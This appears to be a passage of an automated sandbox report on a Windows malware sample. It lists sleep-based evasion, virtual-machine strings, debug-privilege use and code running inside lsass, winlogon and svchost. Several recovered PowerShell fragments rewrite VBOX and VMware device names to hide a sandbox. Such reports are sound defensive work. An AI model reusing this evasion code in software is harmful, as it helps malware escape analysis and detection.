          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 7.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 7.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 5991 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960Thread sleep count: 3829 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep count: 8510 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep time: -8510000s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep count: 1488 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 3292Thread sleep time: -1488000s >= -30000sJump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 6220Thread sleep count: 9928 > 30Jump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 6220Thread sleep time: -9928000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep count: 7178 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep count: 2346 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep count: 247 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5616Thread sleep time: -247000s >= -30000sJump to behavior
          Source: C:\Windows\System32\dwm.exe TID: 2944Thread sleep count: 9874 > 30Jump to behavior
          Source: C:\Windows\System32\dwm.exe TID: 2944Thread sleep time: -9874000s >= -30000sJump to behavior
          Source: C:\Windows\System32\dialer.exe TID: 6132Thread sleep count: 1803 > 30
          Source: C:\Windows\System32\dialer.exe TID: 6132Thread sleep time: -180300s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1976Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1976Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4068Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep count: 201 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -201000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2752Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2752Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1412Thread sleep count: 239 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1412Thread sleep time: -239000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep count: 248 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6432Thread sleep time: -248000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1960Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5588Thread sleep count: 236 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5588Thread sleep time: -236000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3920Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep count: 255 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5812Thread sleep time: -255000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2716Thread sleep count: 254 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2716Thread sleep time: -254000s >= -30000s
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898DCE0 FindFirstFileExW,21_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86DCE0 FindFirstFileExW,27_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CDCE0 FindFirstFileExW,30_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1DCE0 FindFirstFileExW,31_2_000001160CA1DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10ADCE0 FindFirstFileExW,46_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93DCE0 FindFirstFileExW,47_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854DCE0 FindFirstFileExW,48_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531DCE0 FindFirstFileExW,49_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DDCE0 FindFirstFileExW,50_2_00000254A27DDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDDCE0 FindFirstFileExW,51_2_0000024B87DDDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40DCE0 FindFirstFileExW,52_2_00000205FD40DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056ADCE0 FindFirstFileExW,53_2_000001A2056ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6DCE0 FindFirstFileExW,54_2_0000018EC1F6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0DCE0 FindFirstFileExW,55_2_0000025CE3E0DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898DCE0 FindFirstFileExW,56_2_000002623898DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59DCE0 FindFirstFileExW,57_2_000002786E59DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFADCE0 FindFirstFileExW,58_2_000001611FFADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38DCE0 FindFirstFileExW,59_2_0000027C0F38DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.52.drBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: Microsoft-Windows-Partition%4Diagnostic.evtx.52.drBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: svchost.exe, 00000034.00000000.2178476361.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.3376207799.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: svchost.exe, 00000034.00000000.2178508976.00000205FAC43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: VMware SATA CD00
          Source: svchost.exe, 00000032.00000002.3392383683.00000254A2FDA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: NECVMWarVMware SATA CD00
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
          Source: Microsoft-Windows-Partition%4Diagnostic.evtx.52.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: storahciNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.52.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
          Source: lsass.exe, 0000001B.00000000.2121920051.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3371581658.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3369748191.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2125470026.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2152084537.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3369193733.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2153856421.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3365054006.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2164109329.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3372629205.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2178476361.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: dwm.exe, 0000001F.00000002.3403437969.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: System.evtx.52.drBinary or memory string: VMCI: Using capabilities (0x1c).
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: svchost.exe, 00000034.00000000.2178331436.00000205FABB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicNECVMWarVMware SATA CD00
          Source: svchost.exe, 00000034.00000000.2183063878.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
          Source: svchost.exe, 00000034.00000003.2239849466.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
          Source: svchost.exe, 00000034.00000002.3401813667.00000205FBFA5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 7-4vmci
          Source: svchost.exe, 0000001E.00000000.2125611374.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: svchost.exe, 00000030.00000002.3364015684.000001CA97800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: VMware
          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.52.drBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D129000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW j
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
          Source: Microsoft-Windows-PowerShell%4Operational.evtx.52.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_14-413
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E858987D90
          Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,45_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,14_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF749F41160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF749F41160
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E858987D90
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001E85898D2A4
          Source: C:\ProgramData\IGaming\driver.exeCode function: 26_2_00007FF7F4F21160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,26_2_00007FF7F4F21160
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000140AE867D90
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00000140AE86D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000195DD5CD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000195DD5C7D90
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001160CA1D2A4
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA17D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001160CA17D90
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,44_2_0000000140001160
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000257E10AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000257E10A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001F28C937D90
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001F28C93D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000001CA9854D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000001CA98547D90
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001D265317D90
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001D26531D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_00000254A27DD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_00000254A27D7D90
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000024B87DDD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_0000024B87DD7D90
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000205FD40D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD407D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00000205FD407D90
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001A2056AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001A2056A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000018EC1F67D90
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_0000018EC1F6D2A4
